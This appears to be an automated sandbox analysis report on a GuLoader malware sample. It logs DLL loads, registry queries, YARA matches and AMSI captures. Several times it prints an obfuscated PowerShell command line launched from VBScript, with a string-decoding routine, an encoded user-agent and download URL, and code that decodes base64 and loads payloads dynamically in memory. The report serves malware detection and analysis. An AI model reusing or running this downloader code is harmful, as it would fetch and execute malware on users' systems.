Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2411714026.0000000002F7F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb.ene source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbeW: source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERSHELL "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regno", "0")

Yara detected GuLoader

Source: Yara match	File source: 00000005.00000002.2423592720.000000000C494000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2423205589.0000000008930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2415922796.0000000005C82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Unresourceful)$global:Evaporerende = [System.Text.Encoding]::ASCII.GetString($Stamherrers)$global:Reviling=$Evaporerende.substring(295973,28447)<#Sangbgers Snkningsomraade Ultrametam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Malvastrum $Ukorrekthedens $neutralisationer), (slushing @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Udlgningens = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Forskubbe)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Statcoulomb, $false).DefineType($Urationel, $Sl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Unresourceful)$global:Evaporerende = [System.Text.Encoding]::ASCII.GetString($Stamherrers)$global:Reviling=$Evaporerende.substring(295973,28447)<#Sangbgers Snkningsomraade Ultrametam

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF8490171C8 push esp; retf	2_2_00007FF8490171C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_077508C2 push eax; mov dword ptr [esp], ecx	5_2_07750AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09123112 push eax; retf	5_2_09123122
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911F522 push ecx; retf	5_2_0911F5EE
